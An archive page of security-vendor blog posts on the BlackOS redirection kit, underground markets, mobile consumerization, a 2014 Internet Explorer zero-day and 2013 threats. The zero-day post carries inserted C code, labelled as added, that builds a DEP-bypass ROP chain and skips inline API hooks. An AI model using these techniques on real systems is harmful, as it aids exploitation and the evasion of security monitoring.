TrendLabs Security Intelligence Blog

    Author Archive - Trend Micro

    We recently came across this particular post in an underground forum:

    Figure 1. Underground forum post

This post, written in Russian, advertised a new product called “BlackOS”. Contrary to the name, it is not an operating system. It is, however, definitely “black”, i.e. malicious: it is used to manage Internet traffic arriving from malicious or compromised websites and redirect it to other malicious sites.

These types of products are not new in underground communities; for example, Brian Krebs wrote about a similar service almost two years ago. Even BlackOS itself is not completely new: it is a new version of the earlier “Tale of the North” software, which security researchers described in September 2013.

    Capabilities of BlackOS

BlackOS and similar packages are designed to make managing and exploiting websites easier by automating the process, which lets a cybercriminal squeeze the most profit out of his victims. It has a web interface used to manage the web traffic and its various features. It can cope with high volumes of Internet traffic, inject iframes, and redirect traffic as specified by its user.

    Here are some of the features of BlackOS, as stated in an advertisement in underground forums (as translated from the original Russian):

1) Implements the optimal model of converting traffic. Distributes and installs on geo user agent;
2) Get a unique opportunity to refuse to sell iframe traffic;
3) Automatically detect PR domains, links and implement an effective impact on the issuance of search engines;
4) Get fast, stable and private socks5 lists for any of your software requiring the use of a proxy;
5) Sort the list of accounts as fast as possible;
6) Upload any of your scripts with verification. Pour shells and mass execute commands on them: set/code cleanup, eval(), system(), sendmail and check antiDDOS;
7) Perform a vulnerability scan on your servers;
8) Process the parsing of databases of remote CMS.

New features for managing accounts, along with powerful SEO tools and an interface intuitive for both novice webmasters and professionals, allow us to hope that BlackOS will take its rightful place on your work space.

    BlackOS is not particularly cheap. It costs $3,800 a year; a reinstall/rebuild costs $100. For cybercriminals on a budget, basic configurations (16GB of RAM, octacore CPU, and SSD storage) can be rented for $100 a month. (The creators of BlackOS only accept payment in Bitcoin, Litecoin, or Perfect Money.)

One of the features of BlackOS is integration with online scanners that check whether a website is already blocked by various security solutions, as seen below:

    Figure 2. Online scanner

As we mentioned earlier, BlackOS appears to be an updated version of the previous Tale of the North package. One may ask why, then, it is being sold as “new” software. For that, we have to look into the Tale of the North and its author, Peter Severa.

    Peter Severa and the Tale of the North

Peter Severa, who uses the handle Severa in various underground forums, began as a spammer as far back as 2003. He has operated various spam botnets, including Waledac and Kelihos; in fact, he is currently facing criminal charges relating to his use of the latter. This has not deterred him: to this day he remains active in the underground.

    His ICQ and Jabber accounts are well-known to the underground community; he also had a Webmoney account at one time, although that account was banned. We believe that the now-banned account was used by another “handle”, which was actually Severa hiding his identity. We also believe that Severa has a new Webmoney account.

    Severa wrote Tale of the North to manage the web traffic coming from users clicking links in his spam emails. For example, he could redirect users to various websites based on their geographic location.

    Recently, however, there appears to have been a dispute between Severa and other people involved with Tale of the North. According to the following underground forum post, Severa left the project and the other “contributors” have continued under the BlackOS name:

    Figure 3. Underground forum post

    A partial translation of that post follows:

BlackOS previously sold as North Tale. We had a team and there was a conflict, and I closed the project. The system is now marketed under the name BlackOS, and I have nothing to do with it now. I make no claims to manager/BlackOS; all conflicts between us completely settled and I wish him success in his future development and sales of the software. It’s a really cool product that is unparalleled in the market, which required a decent number of man-years of development.

    We don’t know much about who’s selling BlackOS now. His Jabber account is publicly known (so would-be clients can contact him), and he also goes by the handle manager. Beyond that, his identity is unclear.

    What about Severa? He hasn’t left the underground community. He is now running two active affiliate programs—both named partially after himself: SevPod and SevSka—that spread spambot malware.

    In February, Severa was advertising SevPod in forum posts, like this one:

    Figure 4. SevPod advertisement

    A partial translation follows:

I want to introduce you to your new project – a private affiliate for substitution issue, {affiliate program URL}. I managed to make a really long-lived substitute, and your download will bring you income for many months, even after you stop shipping. Unlike other substitutions, I have bids for virtually all countries. Of course, miracles do not happen, and you will get the maximum revenue from the US, Canada, Australia, UK, Western Europe, but the third world countries will bring you a steady income for a long time too! 95% of the money that I get for clicks from feed providers, I pay for your ads.

    The about page for SevPod goes on:

    … is the latest revolutionary affiliate program by substitution SERPs. We get maximum bids from our feed providers, 95% of the funds we receive we give to our clients. Convert clicks from almost all countries of the world. We also use more modern methods of monetizing traffic, such as pay per user activity on the site, pay per view and interactions with different content. Unlike click bot traffic, we use live traffic, so our traffic is much more expensive, and will bring you income for a long time.

From these posts and sites, it is clear that Severa is still involved in the traffic redirection and spam business, although one could say he now focuses more on the “business” side of cybercrime than on the technical side.

    The information we gathered in this post was taken from various underground sources, although all of it was essentially public. We urge any law enforcement agencies investigating Severa or the creators of BlackOS to reach out to us, as we have additional information that is not part of this post.

Posted in Bad Sites, Malware

There are places on the Internet where cybercriminals come together to buy and sell products and services. Instead of building their own attack tools from scratch, they can purchase what they need from peers offering competitive prices. Like any other market, the laws of supply and demand dictate prices and feature offerings. What is more interesting to note is that recently, prices have been going down.

Over the years, we have kept tabs on major developments in the cybercriminal underground. Years of constant monitoring have allowed us to gather the intelligence to characterize the more advanced markets we have seen so far and to compile comprehensive lists of their offerings.

    In 2012, we published “Russian Underground 101,” which showcased what the Russian cybercriminal underground market had to offer. Later that year, we worked with the University of California Institute of Global Conflict and Cooperation to publish “Investigating China’s Online Underground Economy,” which featured the Chinese cybercriminal underground.

    Last year, we revisited the Chinese underground and published “Beyond Online Gaming: Revisiting the Chinese Underground Market.” We learned then that every country’s underground market has distinct characteristics. So this year, we will add another market to our growing list: Brazil.

The barriers to launching cybercriminal operations have dropped considerably. Toolkits are more available and cheaper; some are even offered free of charge. Prices are lower and features are richer. Underground forums are thriving worldwide, particularly in Russia, China, and Brazil, where they have become popular venues for selling products and services to cybercriminals.

    Cybercriminals are also making use of the Deep Web to sell products and services outside the indexed or searchable World Wide Web, making their online “shops” harder for law enforcement to find and take down.

    Our first cybercrime economy update for the year will focus on the burgeoning market for mobile malware/scam-related tools and software in China, to be released next week on March 3.

All of these developments mean that the computing public is at greater risk of being victimized than ever, and must reconsider how big a part security should play in everyday computing. In the coming months we will dig deeper into these markets and present our findings to educate users.

Posted in Malware


In these times, embracing consumerization is not only inevitable for any company; at some level it is now necessary. It has become a powerful business tool, bringing efficiency to the company and convenience to employees. The use of mobile devices in corporate environments is the primary example of consumerization in practice, and one that enterprises adopt more and more each day.

    With continued adoption comes challenges. The risks around mobile threats are typically focused on malicious apps, but for enterprises there are other problems. Since the devices are used to store, send, and receive corporate data, protecting them from unauthorized access is critical to the company. So how can we maintain enterprise-level security in consumer-level devices?

The risks entailed by consumerization have proven difficult to deal with: the complexity of managing multiple platforms, separating personal and corporate data, avoiding data leakage, and addressing privacy concerns has enterprises struggling to find the balance between convenience and security. As long as that balance remains unachieved, the risk grows. Mismanaging consumerization has proven costly for enterprises, as cybercriminals now see mobile devices on enterprise networks as an addition to their attack surface: a new vector they can use to infiltrate.

    In the past we’ve talked about a three-step plan to consumerization, which includes having a plan, identifying a set of policies to implement, and putting in the right infrastructure to apply the identified policies.

Our Trend Micro Safe Mobile Workforce is an example of infrastructure that can be used when embracing consumerization. It is a virtual mobile infrastructure solution that aims to answer the needs of both IT managers and employees by providing a clear infrastructure that separates corporate and personal data. It hosts the mobile operating system on centralized servers to provide a safe environment whenever users need to access corporate information.

    What does this mean for users? It means that their corporate mobile environment is not stored in their device, so their data remains secure even if the device gets lost. They can also access their environment from any location, without being tied to a single device. This also means that there is no limitation in terms of functionality when the employee uses the device for personal purposes.

What does this mean for IT administrators? It means that they will be able to fully manage and maintain all corporate environments connected to the network (Android and iOS) through the centralized server. And since Safe Mobile Workforce completely separates corporate and user data, administrators get full control of the corporate environment without worrying about privacy concerns from employees.

    To get a better idea of how the Trend Micro Safe Mobile Workforce works, check out our infographic, Split Screen: Separating Corporate from Personal Data on Mobile Devices.

Posted in Mobile

Any vulnerability in Internet Explorer is a large issue, but last week’s zero-day vulnerability (designated as CVE-2014-0322) is particularly interesting. It used what we call a “hybrid exploit”, in which the exploit code is split across multiple components built on different technologies: in this case, JavaScript and Adobe Flash. Hybrid exploits give attackers a way to evade existing mitigation technologies like ASLR and DEP.

    Let’s go over how this exploit was delivered to users. The victim website was compromised, and two malicious files were uploaded to it:

    • Erido.jpg (detected as HTML_EXPLOIT.PB, MD5 hash: 00ae7a1514809749a57d4d05d8c969b5)
    • Tope.swf (detected as SWF_EXPLOIT.PB, MD5 hash: 732b6a98b0a7b2ee795f2193a041520d)

    The overall flow can be found in the following diagram, which will be explained in the text.

    Figure 1. Overall control flow

    A page on the website (img.html) was modified with additional JavaScript and an iframe to load the malicious Flash file, as follows:

    <embed src=Tope.swf width=10 height=10></embed>

When called, the Flash file carries out a heap spray. Control is then passed back to the JavaScript via a function call in the Flash file. The code that actually triggers CVE-2014-0322 is found here, in the JavaScript, and not in the Flash file. (To prevent further attacks that may exploit this vulnerability, we will not provide further details about the trigger.) Control is then passed back to the Flash file, where the code responsible for arbitrary memory reads and writes is located.

From here on, the goal of the code is simple: it searches memory for return-oriented programming (ROP) gadgets (specifically, gadgets in ntdll.dll), constructs the ROP chain, and overwrites the virtual table of a Flash object in order to hijack the execution flow of the Flash virtual machine.

    Two ROP gadgets were used in this attack:

    • 77a646a8 94 xchg eax,esp // Pivot the stack pointer
    • ntdll!ZwProtectVirtualMemory (1a1b3000, 1000, PAGE_EXECUTE_READWRITE)

The first ROP gadget pivots the stack pointer so that it points to attacker-controlled data; the second calls ZwProtectVirtualMemory to change the protection of the page holding the shellcode to PAGE_EXECUTE_READWRITE, bypassing DEP. The arbitrary read primitive in the Flash file is what makes this work under ASLR: the gadget and API addresses are located in ntdll.dll at runtime rather than hardcoded.
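The stack layout that the two gadgets above rely on, as an added example that is not code from the original post or from the exploit. It lays the chain out word by word as the attacker would in the sprayed buffer and then walks it the way the CPU does after the hijacked virtual call lands in `xchg eax,esp ; ret`. The `xchg eax,esp` address, the 0x1a1b3000/0x1000 region and PAGE_EXECUTE_READWRITE come from the post; the ZwProtectVirtualMemory address, the chain's base address and the previous page protection are hypothetical placeholders chosen only so the walk can be checked offline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the original post. Only the xchg gadget, the
 * 0x1a1b3000/0x1000 region and 0x40 come from the post; the rest are
 * hypothetical placeholders. */
#define GADGET_XCHG_EAX_ESP    0x77a646a8u  /* from the post: xchg eax,esp ; ret */
#define ZW_PROTECT_VM          0x77a2f0c0u  /* hypothetical: ntdll!ZwProtectVirtualMemory */
#define SHELLCODE_ADDR         0x1a1b3000u  /* from the post: sprayed region to make RWX */
#define SHELLCODE_SIZE         0x1000u
#define PAGE_EXECUTE_READWRITE 0x40u
#define NT_CURRENT_PROCESS     0xffffffffu  /* (HANDLE)-1 pseudo-handle */
#define CHAIN_BASE             0x0c0c0c00u  /* hypothetical: where the chain sits in the spray */

/* Word-by-word layout of the pivoted stack. ZwProtectVirtualMemory is
 * stdcall with five arguments: on entry [esp] is the return address and
 * [esp+4..esp+20] the arguments; it pops all five before RET, so W_RETURN
 * is where execution lands once the page is RWX. The pointer arguments
 * must point at memory the attacker controls, hence the trailing cells. */
enum {
    W_CALLEE = 0,   /* popped by the pivot gadget's RET */
    W_RETURN,       /* ZwProtectVirtualMemory returns here: the shellcode */
    W_HPROCESS,     /* arg1: ProcessHandle */
    W_PBASE,        /* arg2: PVOID *BaseAddress (points into this buffer) */
    W_PSIZE,        /* arg3: PSIZE_T RegionSize (points into this buffer) */
    W_NEWPROT,      /* arg4: NewProtect */
    W_POLD,         /* arg5: PULONG OldProtect (points into this buffer) */
    W_BASE_CELL,    /* *BaseAddress */
    W_SIZE_CELL,    /* *RegionSize */
    W_OLD_CELL,     /* *OldProtect, written by the kernel */
    CHAIN_WORDS
};

static uint32_t word_va(int idx) { return CHAIN_BASE + 4u * (uint32_t)idx; }
static int in_chain(uint32_t va) { return va >= CHAIN_BASE && va < word_va(CHAIN_WORDS) && (va & 3u) == 0; }

void build_rop_chain(uint32_t chain[CHAIN_WORDS])
{
    memset(chain, 0, CHAIN_WORDS * sizeof chain[0]);
    chain[W_CALLEE]    = ZW_PROTECT_VM;
    chain[W_RETURN]    = SHELLCODE_ADDR;
    chain[W_HPROCESS]  = NT_CURRENT_PROCESS;
    chain[W_PBASE]     = word_va(W_BASE_CELL);
    chain[W_PSIZE]     = word_va(W_SIZE_CELL);
    chain[W_NEWPROT]   = PAGE_EXECUTE_READWRITE;
    chain[W_POLD]      = word_va(W_OLD_CELL);
    chain[W_BASE_CELL] = SHELLCODE_ADDR;
    chain[W_SIZE_CELL] = SHELLCODE_SIZE;
}

typedef struct {
    int      ok;        /* 1 if the walk reached ZwProtectVirtualMemory with sane arguments */
    uint32_t base;      /* region passed to ZwProtectVirtualMemory */
    uint32_t size;
    uint32_t newprot;
    uint32_t next_eip;  /* where the stdcall RET lands */
} pivot_result_t;

/* Walk the chain the way the CPU would: the hijacked virtual call lands in
 * the overwritten vtable slot with EAX holding the object pointer, so after
 * `xchg eax,esp` ESP is that pointer and every RET / stdcall pop consumes
 * one word. Only the single call the post describes is modelled. */
pivot_result_t simulate_hijacked_call(uint32_t vtable_slot, uint32_t eax, uint32_t chain[CHAIN_WORDS])
{
    pivot_result_t r = {0, 0, 0, 0, 0};
    if (vtable_slot != GADGET_XCHG_EAX_ESP) return r;  /* control went somewhere else */
    uint32_t esp = eax;                                /* xchg eax,esp */
    if (esp != CHAIN_BASE) return r;                   /* outside the modelled buffer */
    int sp = 0;
    uint32_t eip = chain[sp++];                        /* ret */
    if (eip != ZW_PROTECT_VM) return r;                /* chain does not reach the API */
    uint32_t ret_addr = chain[sp++];                   /* [esp] as seen by the callee */
    uint32_t arg[5];
    for (int i = 0; i < 5; i++) arg[i] = chain[sp++];  /* stdcall: callee pops these */
    if (!in_chain(arg[1]) || !in_chain(arg[2]) || !in_chain(arg[4])) return r;
    r.base    = chain[(arg[1] - CHAIN_BASE) / 4];      /* *BaseAddress */
    r.size    = chain[(arg[2] - CHAIN_BASE) / 4];      /* *RegionSize */
    r.newprot = arg[3];
    chain[(arg[4] - CHAIN_BASE) / 4] = 0x20u;          /* *OldProtect: hypothetical previous value */
    r.next_eip = ret_addr;                             /* RET 0x14 inside the callee */
    r.ok = 1;
    return r;
}

pivot_result_t demo_pivot(void)
{
    uint32_t chain[CHAIN_WORDS];
    build_rop_chain(chain);
    /* EAX is the sprayed object whose vtable slot now holds the pivot gadget */
    return simulate_hijacked_call(GADGET_XCHG_EAX_ESP, CHAIN_BASE, chain);
}

pivot_result_t demo_pivot_misaligned(void)
{
    uint32_t chain[CHAIN_WORDS];
    build_rop_chain(chain);
    return simulate_hijacked_call(GADGET_XCHG_EAX_ESP, CHAIN_BASE + 4u, chain); /* EAX off by one word */
}

int main(void)
{
    pivot_result_t r = demo_pivot();
    printf("ok=%d ZwProtectVirtualMemory(base=%08x, size=%x, prot=%02x) -> eip=%08x\n",
           r.ok, r.base, r.size, r.newprot, r.next_eip);
    return r.ok ? 0 : 1;
}
```

The point the walk makes explicit is why a single `xchg eax,esp` is enough: once ESP points into the sprayed object, every subsequent RET and stdcall argument is read from attacker-controlled words, so the "chain" is just data laid out in the order the calling convention consumes it. The misaligned case shows the fragility the text hints at with the heap spray: if EAX does not land exactly on the chain, nothing useful executes.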

If the shellcode needs to call an API, it first checks whether the API is hooked inline by inspecting the first opcode bytes of the API. If it is, the shellcode skips the first 5 bytes of the API to escape the hook. This technique bypasses security products that rely on such hooks to watch for this behavior.
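The check described above, as an added example written for this page rather than taken from the shellcode. The byte strings are constructed: one is the standard hot-patchable prologue of a 32-bit Windows API export, the other the same export after a user-mode monitor has overwritten its first five bytes with `JMP rel32`. The API address and the hook handler address are hypothetical placeholders.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the original post. Nothing here reads a real
 * process; the byte patterns below are constructed. */
typedef enum {
    PROLOGUE_CLEAN = 0,   /* mov edi,edi ; push ebp ; mov ebp,esp */
    HOOK_JMP_REL32,       /* E9 xx xx xx xx : the 5-byte form the post describes */
    HOOK_JMP_ABS,         /* FF 25 xx xx xx xx : jmp dword ptr [abs] */
    HOOK_PUSH_RET,        /* 68 xx xx xx xx C3 : push addr ; ret */
    PROLOGUE_UNKNOWN
} prologue_kind_t;

/* Hot-patchable prologue emitted for most 32-bit Windows API exports:
 *   8B FF  mov edi,edi    55  push ebp    8B EC  mov ebp,esp          */
static const uint8_t k_std_prologue[5] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };

/* What the shellcode looks at: the first opcode bytes of the export. */
prologue_kind_t classify_prologue(const uint8_t *p, size_t n)
{
    if (n >= 5 && memcmp(p, k_std_prologue, 5) == 0) return PROLOGUE_CLEAN;
    if (n >= 5 && p[0] == 0xE9)                       return HOOK_JMP_REL32;
    if (n >= 6 && p[0] == 0xFF && p[1] == 0x25)       return HOOK_JMP_ABS;
    if (n >= 6 && p[0] == 0x68 && p[5] == 0xC3)       return HOOK_PUSH_RET;
    return PROLOGUE_UNKNOWN;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Where a JMP rel32 hook diverts execution: target = next instruction + rel32.
 * Unsigned wraparound reproduces the two's-complement displacement. */
uint32_t jmp_rel32_target(uint32_t api_va, const uint8_t *p)
{
    return api_va + 5u + le32(p + 1);
}

/* The evasion the post describes: if the first instruction is a hook, enter
 * at api+5, past the overwritten bytes. The shellcode then has to perform
 * the displaced `mov edi,edi ; push ebp ; mov ebp,esp` itself before jumping. */
uint32_t evasive_entry(uint32_t api_va, const uint8_t *p, size_t n)
{
    return classify_prologue(p, n) == HOOK_JMP_REL32 ? api_va + 5u : api_va;
}

/* Constructed samples; the export address is a placeholder. */
#define API_VA 0x7c801a28u
static const uint8_t sample_clean[8]  = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x6A, 0xFF, 0x68 };
/* same export after a monitor wrote JMP to a hypothetical handler at 0x10001000 */
static const uint8_t sample_hooked[8] = { 0xE9, 0xD3, 0xF5, 0x7F, 0x93, 0x6A, 0xFF, 0x68 };

int main(void)
{
    printf("clean : kind=%d entry=%08x\n", classify_prologue(sample_clean, 8),
           evasive_entry(API_VA, sample_clean, 8));
    printf("hooked: kind=%d handler=%08x entry=%08x\n", classify_prologue(sample_hooked, 8),
           jmp_rel32_target(API_VA, sample_hooked), evasive_entry(API_VA, sample_hooked, 8));
    return 0;
}
```

The classification is deliberately broader than the one-byte test the post describes: a hook placed at the first instruction, whatever its encoding, is visible from the first few bytes, and a caller that knows the original prologue can step over it. That is the weakness of monitoring from a user-mode inline hook at the export's entry point, and it is why the shellcode's check is so cheap.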

    Figure 2. Malicious shellcode

    The above shellcode does the following:

1. Decodes two PE files using the data in the file Erido.jpg
2. Drops the two PE files to:
  • %Temp%\sqlrenew.txt
  • %Temp%\stream.exe
3. Loads the contents of sqlrenew.txt into memory
4. Returns to the caller to prevent a Flash or IE crash

The contents of sqlrenew.txt merely execute the other dropped file, stream.exe. However, this happens only when IE is terminated and the module itself is being unloaded.

    Figure 3. Malicious shellcode


Any zero-day vulnerability in a widely used program like Internet Explorer is significant, but this one appears to be doubly so. To avoid known exploit mitigation techniques like ASLR and DEP, this attack uses multiple web objects that interact with one another to carry out the exploit, instead of a single, easily detected file.

    It is likely that we will see more of this technique in the future as cybercriminals try to make their exploits more effective on all platforms. Both developers and security vendors will need to respond to this emerging threat in order to keep users safe.

Posted in Exploits, Vulnerabilities

2013 was another year marked by many changes – for good and bad – in the threat landscape. Some threats waned, others grew significantly, while completely new threats emerged and made life difficult for users. What remained constant, however, were the threats against the safety of digital information. In this entry, we present some of the threats seen last year. They are described in more detail in our roundup titled Cashing In On Digital Information.

    Cybercrime: Banking Malware, CryptoLocker Grow; Blackhole Exploit Kit Tumbles

    Some malware types linked to cybercrime grew significantly in 2013. We saw almost a million new banking malware variants, which was double what we saw in 2012. Much of this growth occurred in the latter half of the year:

    Figure 1. Volume of new banking malware

    Two countries – the United States and Brazil – accounted for half of all banking malware victims:

    Figure 2. Countries most affected by banking malware

    We saw ransomware become far more potent in the latter part of the year as CryptoLocker emerged as a new threat that hit users hard. This new threat – an evolution of previous ransomware attacks – encrypted the data of users, requiring a one-time payment of approximately $300 (payable in cryptocurrencies like Bitcoin) before their data would be decrypted. In some ways, CryptoLocker became as serious a problem for end users as fake antivirus malware had in previous years.

    The fall of the Blackhole Exploit Kit in 2013 due to the arrest of its creator, Paunch, was a significant event that appreciably changed the threat landscape. It significantly cut the use of malicious links in spam messages by attackers. While other exploit kits have emerged into the threat landscape since then, no other kit has achieved BHEK’s levels of prominence.

    Targeted Attacks and Data Breaches: Still In Operation

    Despite reduced media attention, targeted attacks continued to hit organizations across the world last year. We observed attacks in many parts of the world, with countries in Asia at particular risk from these coordinated targeted attacks. Well-organized campaigns like EvilGrab and Safe highlighted the capabilities and sophistication of modern targeted attacks.

    Figure 3. Countries affected by targeted attacks

    Data breaches also continued to plague organizations. Companies like Adobe, Evernote, and LivingSocial were all hit by various breaches that exposed the customer data of millions of users. Breaches like these not only cause a loss of face for the affected organizations, but may also put them at legal risk for failing to protect the data of their users.

    Mobile Threats: Mobile Banking Under Fire

    Mobile threats continued to flourish last year, with an estimated one million malicious and high-risk apps found in the year alone. Significantly, we saw increasing use of mobile banking threats like the PERKEL and FAKEBANK families, both of which put users of mobile banking apps and websites at the same risk of fraud and financial loss that other users face. Information stealers like banking malware are now the third most common type of malicious/high-risk app found, behind traditional standbys like premium service abusers and adware:

    Figure 4. Types of mobile malware threats

    Digital Life: Privacy at Risk

Revelations about government spying made many question whether online privacy was still alive, or even possible. Previously, users had worried that cybercriminals could get their hands on their personal information; now they worry about large, previously trusted organizations – both government and private – doing the same thing.

    Attacks delivered via social media (combined with social engineering) have now become the norm, with newer social networks like Instagram, Pinterest, and Tumblr suffering from their own scams as well. Indeed, attacks on all social media platforms have become so common, it may almost be considered “business as usual.”

    For a more comprehensive analysis of these threats, check our 2013 roundup titled Cashing In On Digital Information.

Posted in Bad Sites, Exploits, Malware, Mobile, Social, Spam, Targeted Attacks


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice